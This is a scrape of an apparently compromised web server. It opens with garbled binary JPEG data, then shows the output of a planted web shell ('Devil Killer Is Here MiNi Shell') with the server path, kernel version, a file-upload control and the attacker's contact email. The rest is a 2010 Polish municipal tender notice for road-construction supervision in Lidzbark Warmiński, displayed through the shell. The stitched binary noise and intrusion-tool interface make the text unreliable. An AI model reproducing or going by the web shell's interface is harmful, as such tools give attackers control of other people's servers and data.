JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/13999-N-2010.html

<p class="kh_header"><b>Lidzbark Warmiński: Pełnienie funkcji  Inżyniera Kontraktu projektu pn.: Budowa drogi od ulicy Olsztyńskiej w kierunku ulicy Wiejskiej przy Górze Krzyżowej</b><br>
<b>Numer ogłoszenia: 13999 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji  Inżyniera Kontraktu projektu pn.: Budowa drogi od ulicy Olsztyńskiej w kierunku ulicy Wiejskiej przy Górze Krzyżowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu projektu pn.: 
    Budowa drogi od ulicy Olsztyńskiej w kierunku ulicy Wiejskiej przy Górze Krzyżowej.    
2. Podstawowe obowiązki Wykonawcy:
1) wykonywanie wszelkich działań wynikających z przepisów prawa lub wytycznych  Instytucji Zarządzającej Regionalnym Programem Operacyjnym Warmia i Mazury na lata 2007-2013, które umożliwią Zamawiającemu prawidłową realizację Projektu     
współfinansowanego ze środków Unii Europejskiej, w sposób zgodny z umową            o dofinansowanie, instrukcjami, założeniami programowymi i dyrektywami, w tym m.in. 
opracowanie, przygotowanie i terminowe  przekazanie w imieniu Zamawiającego do 
Instytucji Zarządzającej raportów, sprawozdań, wniosków o płatność i wszelkich innych dokumentów będących wypełnieniem obowiązków nałożonych na Beneficjenta środków unijnych przy realizacji Projektów dofinansowywanych w ramach RPO WiM.
  2) pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu zgodnie  z postanowieniami decyzji pozwolenia na budowę, przepisami prawa budowlanego i innymi obowiązującymi w tym zakresie przepisami, a w szczególności:
    a) reprezentowanie inwestora na budowie poprzez sprawdzenia zgodności realizowanego projektu z umową, dokumentacją projektową i pozwoleniem na budowę, zasadami wiedzy technicznej oraz przepisami techniczno-budowlanymi i Polskimi Normami,
b) przeciwdziałanie nieprawidłowościom na placu budowy w związku z realizacją 
    projektu oraz podejmowanie niezbędnych w tym zakresie czynności,
c) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych,  a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych  i niedopuszczonych do obrotu i stosowania w budownictwie,
d) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 
    uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru końcowego projektu i przekazanie go do użytkowania,
e) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy poprzez potwierdzenie wykonanego przez realizatora robót budowlano-montażowych zakresu rzeczowego i finansowego projektu, w szczególności w zakresie zgodności przyjętych założeń w harmonogramie rzeczowo-finansowym,  w protokołach odbioru robót, stanowiących podstawę do wystawiania faktur przez realizatora robót,
f) sprawdzenie harmonogramu rzeczowo-finansowego dostarczonego przez realizatora 
  robót w zakresie zgodności przyjętych założeń z dokumentacją projektową  i  kosztorysem ofertowym, w terminie nie dłuższym niż 7 dni od dostarczenia przez  
Zamawiającego.
g) kontrola postępu prac i robót,
h) weryfikacja kosztorysów inwestorskich, ofertowych, robót dodatkowych i zamiennych pod względem kompletności zawartości,
i) udział i przewodnictwo w naradach roboczych (sporządzanie protokołów z narad) na  etapie realizacji projektu mających na celu m.in. rozstrzyganie technicznych spraw budowy, omawianie przebiegu realizacji budowy, itp.
j) opracowanie oraz przekazywanie Zamawiającemu niezbędnych dokumentów do   
   uruchomienia finansowania projektu,
k) stwierdzanie gotowości  wykonanych robót do odbioru,
l) dokonywanie obiorów częściowych robót oraz odbioru końcowego,
ł) przekazywanie Zamawiającemu protokołów odbioru oraz dokumentacji   
     powykonawczej,
m)uzyskanie protokołu badania równości wykonanej nawierzchni asfaltowej, 
    sporządzonego przez laboratorium drogowe,
n) obecność podczas kontroli zewnętrznych w trakcie realizacji projektu i po jego    
     zakończeniu,
o) dokonywanie czynności sprawdzenia kalkulacji szczegółowych lub kosztorysów 
    przedkładanych przez Wykonawcę lub Wykonawców robót,
p) sprawdzenie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót - projektu,
r) uzyskanie na rzecz Zamawiającego decyzji o dopuszczeniu zrealizowanego projektu do użytkowania,
s) udział w pracach komisji powołanych do przeglądów gwarancyjnych dla zrealizowanego  projektu  i o ile zajdzie taka potrzeba udział w pracach komisji powołanych do ustalenia przyczyn stwierdzonych wad i usterek w zrealizowanym i przekazanym do użytkowania obiekcie oraz kontrolowania ich usunięcia w okresie trwania gwarancji, 
t) Inne czynności nie wymienione wyżej, które są niezbędne do prawidłowej realizacji 
projektu.
3. Podstawowe elementy projektu objęte przedmiotem zamówienia:
	a) wykonanie muru oporowego, 
	b) wykonanie drogi gminnej klasy L o długości 935 mb (bez odcinka od ulicy 	Olsztyńskiej objętym przyszłym skrzyżowaniem skanalizowanym), o średniej 	szerokości pasa drogowego 15 m, lokalnie 9m i 20 m przy skarpach w zależności od 	wykopów lub nasypów, w tym:
	- powierzchnia pasa drogowego: 14 025,0 m2
	- powierzchnia utwardzona drogi: 6 176,0 m2
	- powierzchnia utwardzona chodnika i ścieżki rowerowej: 4204,60 m2
	- długość pobocza odarniowanego i zabezpieczonego geokratą: 1 886,4 mb,
	c) budowa kanalizacji deszczowej o długości 1 427,5 mb (również w pasie drogi 	krajowej nr 51),
	d) budowa oświetlenia drogi - liczba słupów oświetleniowych: 29 szt.
	e) zieleń,
	f) inne nie wymienione wyżej, które wchodzą w zakres realizacji  projektu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3, 71.54.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu ma obowiązek wnieść wadium  w wysokości:    
1 500,00 zł. (słownie: jeden tysiąc pięćset złotych) przed  terminem składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki   
    dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli
    przepisy prawa nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do
    wykonania zamówienia,
4) sytuacji ekonomicznej i finansowej.
2. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty oświadczeń i dokumentów, o których mowa w części VII SIWZ. 
Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg  
    formuły: spełnia/ nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22  ust. 1 ustawy  z dnia 29 stycznia - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), Wykonawca zobowiązany jest złożyć następujące  
       dokumenty:
a) oświadczenie o spełnieniu warunków udziału w postępowaniu; (W przypadku 
    wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub 
    więcej Wykonawców oświadczenie musi być podpisane przez wszystkich 
    Wykonawców),
b) wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu 
    składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  
    okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz      załączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.
Wykaz musi zawierać usługi, których przedmiotem było wykonanie co najmniej jednej usługi Inżyniera Kontraktu w robotach budowlanych polegających na budowie lub przebudowie drogi o wartości nie mniejszej niż 7 000 000,00 zł brutto (słownie: siedem milionów złotych).
Do oferty należy również dołączyć dokumenty potwierdzające, że usługi zostały 	wykonane należycie; (W przypadku  wspólnego ubiegania się o udzielenie 
   niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być 
    złożone przedmiotowe dokumenty potwierdzające, że wykonawcy łącznie spełniają 
    ten warunek).
    c) Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz      informacją o prawie do dysponowania tymi osobami; (Wykonawcy składający ofertę wspólną przedstawiają razem jeden dokument).
Wykaz musi zawierać ca najmniej jedną osobę, która  posiada uprawnienia   
budowlane do kierowania robotami budowlanymi bez ograniczeń w następujących
specjalnościach:
- Kierownik Zespołu - Inspektor nadzoru inwestorskiego - uprawnienia budowlane w specjalności drogowej bez ograniczeń uprawniające do kierowania robotami 	    budowlanymi, wykształcenie wyższe, doświadczenie w sprawowaniu 
samodzielnych funkcji technicznych w budownictwie - min. 10 lat.  Od Kierownika   
Zespołu wymagana jest również znajomość procedur programów unijnych 
(w szczególności RPO WiM na lata 2007 - 2013).
     - Inspektor nadzoru inwestorskiego - branża sanitarna - uprawnienia budowlane   w specjalności instalacyjnej w zakresie sieci kanalizacyjnych bez ograniczeń, uprawniające do kierowania robotami budowlanymi, wykształcenie wyższe, 	     	  doświadczenie w sprawowaniu samodzielnych funkcji technicznych w budownictwie - min. 3 lata.
    - Inspektor nadzoru inwestorskiego - branża elektryczna - uprawnienia budowlane  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych         i elektroenergetycznych bez ograniczeń, uprawniające do kierowania robotami 
budowlanymi, wykształcenie wyższe, doświadczenie w sprawowaniu samodzielnych 
funkcji technicznych w budownictwie - min. 3 lata.
     oraz 
co najmniej 1 osobę na stanowisku Specjalisty ds. Rozliczeń, posiadającą wyższe
wykształcenie ekonomiczne lub techniczne lub zarządzanie oraz co najmniej 5 -letnie
doświadczenie zawodowe, która uczestniczyła w rozliczeniu przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków unijnych, która została
odebrana i rozliczona bez uwag, 
d)  Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia.
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie
zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.),
Wykonawca zobowiązany jest złożyć następujące dokumenty:
a) oświadczenie o braku podstaw do wykluczenia (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
b) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,  w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Wykonawcy będący osobami fizycznymi muszą złożyć oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych; (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich). 
 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium    
     Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w ust. 2 lit. b, składa 
     dokument zgodny z § 4 Rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 
     2009 roku w sprawie  dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz.1817).
 4. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły:spełnia - nie spełnia.
5. Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli 	    
wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa     w art. 25 ust. 1 Ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli     
wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 	25 ust. 1 Ustawy, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, 	do 	ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na 	wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu nie później niż   w dniu, w którym upłynął termin składania ofert.
6.  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W takim przypadku należy złożyć dokumenty wymienione w ust. 2         w odniesieniu do tych podmiotów.
7. Wartości o których mowa w ust. 1 lit. b podane w innych walutach niż PLN, należy  przeliczyć na PLN wg tabeli A kursów średnich walut obcych ogłoszonych przez 
Narodowy Bank Polski w dniu wystawienia dokumentu.
W przypadku, gdy Wykonawca będzie miał problem w dokonaniu stosownych 
przeliczeń, przeliczeń dokona  Zamawiający po złożeniu ofert, na podstawie wartości 
podanych w/w dokumentach.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A.Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego 
w ramach:
Osi Priorytetowej 5 - Infrastruktura transportowa regionalna i lokalna,Działanie 5.2 - Infrastruktura Transportowa służąca rozwojowi lokalnemu,
Poddziałanie 5.2.1 - Infrastruktura drogowa warunkująca rozwój lokalny

Creat By MiNi SheLL
Email: jattceo@gmail.com